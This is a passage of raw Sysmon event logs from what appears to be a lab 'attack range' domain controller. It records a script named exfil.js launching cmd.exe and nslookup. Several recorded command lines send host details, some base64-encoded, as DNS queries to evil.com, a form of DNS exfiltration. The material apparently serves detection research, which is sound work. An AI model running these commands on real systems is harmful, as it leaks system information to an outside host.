ystem32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211517Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.117{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211516Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.117{2E1864BB-18E0-629A-6742-000000005F02}39765488C:\Windows\System32\WScript.exe{2E1864BB-18F3-629A-AD44-000000005F02}5352C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211515Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.117{2E1864BB-18F3-629A-AD44-000000005F02}5352C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvkhwpbj.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000211514Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.100{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlwnfc.tmpMD5=56DBCEFC15EB1306F8CE602736A8089D,SHA256=D5DF994C5494FA571A4E37094E6011B6EAA7240C900C90D4E5CDDC8058C5BBCD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000211513Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.085{2E1864BB-18F3-629A-AB44-000000005F02}10366408C:\Windows\system32\conhost.exe{2E1864BB-18F3-629A-AC44-000000005F02}6008C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211512Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.085{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F3-629A-AC44-000000005F02}6008C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211511Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.083{2E1864BB-18F3-629A-AA44-000000005F02}41524796C:\Windows\system32\cmd.exe{2E1864BB-18F3-629A-AC44-000000005F02}6008C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211510Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.083{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211509Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.083{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211508Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.083{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211507Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.083{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211506Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.083{2E1864BB-18F3-629A-AC44-000000005F02}6008C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 33983848448 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F3-629A-AA44-000000005F02}4152C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 33983848448 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwnfc.tmp 2>&1 354300x8000000000000000211505Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.589{00000000-0000-0000-0000-000000000000}4468<unknown process>-udptruefalse127.0.0.1-50889-false127.0.0.1-53domain 354300x8000000000000000211504Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.589{00000000-0000-0000-0000-000000000000}4468<unknown process>-udpfalsefalse127.0.0.1-50888-false127.0.0.1-53domain 354300x8000000000000000211503Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.589{00000000-0000-0000-0000-000000000000}4468<unknown process>-udptruefalse127.0.0.1-50888-false127.0.0.1-53domain 354300x8000000000000000211502Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.507{00000000-0000-0000-0000-000000000000}7476<unknown process>-udptruefalse127.0.0.1-50887-false127.0.0.1-53domain 354300x8000000000000000211501Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.507{00000000-0000-0000-0000-000000000000}7476<unknown process>-udpfalsefalse127.0.0.1-50886-false127.0.0.1-53domain 354300x8000000000000000211500Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.507{00000000-0000-0000-0000-000000000000}7476<unknown process>-udpfalsefalse127.0.0.1-50885-false127.0.0.1-53domain 354300x8000000000000000211499Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.507{00000000-0000-0000-0000-000000000000}7476<unknown process>-udptruefalse127.0.0.1-50885-false127.0.0.1-53domain 354300x8000000000000000211498Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.327{00000000-0000-0000-0000-000000000000}7480<unknown process>-udpfalsefalse127.0.0.1-50882-false127.0.0.1-53domain 354300x8000000000000000211497Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.327{00000000-0000-0000-0000-000000000000}7480<unknown process>-udptruefalse127.0.0.1-50882-false127.0.0.1-53domain 354300x8000000000000000211496Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.327{00000000-0000-0000-0000-000000000000}7480<unknown process>-udpfalsefalse127.0.0.1-50881-false127.0.0.1-53domain 354300x8000000000000000211495Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.327{00000000-0000-0000-0000-000000000000}7480<unknown process>-udptruefalse127.0.0.1-50881-false127.0.0.1-53domain 354300x8000000000000000211494Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.251{00000000-0000-0000-0000-000000000000}4908<unknown process>-udpfalsefalse127.0.0.1-50880-false127.0.0.1-53domain 354300x8000000000000000211493Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.251{00000000-0000-0000-0000-000000000000}4908<unknown process>-udptruefalse127.0.0.1-50880-false127.0.0.1-53domain 354300x8000000000000000211492Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.251{00000000-0000-0000-0000-000000000000}4908<unknown process>-udpfalsefalse127.0.0.1-50879-false127.0.0.1-53domain 354300x8000000000000000211491Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.251{00000000-0000-0000-0000-000000000000}4908<unknown process>-udptruefalse127.0.0.1-50879-false127.0.0.1-53domain 354300x8000000000000000211490Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:36.250{00000000-0000-0000-0000-000000000000}4908<unknown process>-udpfalsefalse127.0.0.1-50878-false127.0.0.1-53domain 10341000x8000000000000000211489Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.046{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F3-629A-AB44-000000005F02}1036C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211488Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.046{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F3-629A-AB44-000000005F02}1036C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211487Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.046{2E1864BB-18F3-629A-AB44-000000005F02}10366408C:\Windows\system32\conhost.exe{2E1864BB-18F3-629A-AA44-000000005F02}4152C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211486Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.032{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F3-629A-AB44-000000005F02}1036C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211485Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.032{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211484Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.032{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211483Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.032{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211482Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.032{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211481Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.032{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F3-629A-AA44-000000005F02}4152C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211480Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.032{2E1864BB-18E0-629A-6742-000000005F02}39764804C:\Windows\System32\WScript.exe{2E1864BB-18F3-629A-AA44-000000005F02}4152C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211479Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.029{2E1864BB-18F3-629A-AA44-000000005F02}4152C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 33983848448 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwnfc.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000211478Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.015{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlaaomv.tmpMD5=56DBCEFC15EB1306F8CE602736A8089D,SHA256=D5DF994C5494FA571A4E37094E6011B6EAA7240C900C90D4E5CDDC8058C5BBCD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000211477Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.999{2E1864BB-18F2-629A-A844-000000005F02}27885232C:\Windows\system32\conhost.exe{2E1864BB-18F3-629A-A944-000000005F02}7416C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211476Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.999{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211475Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.999{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\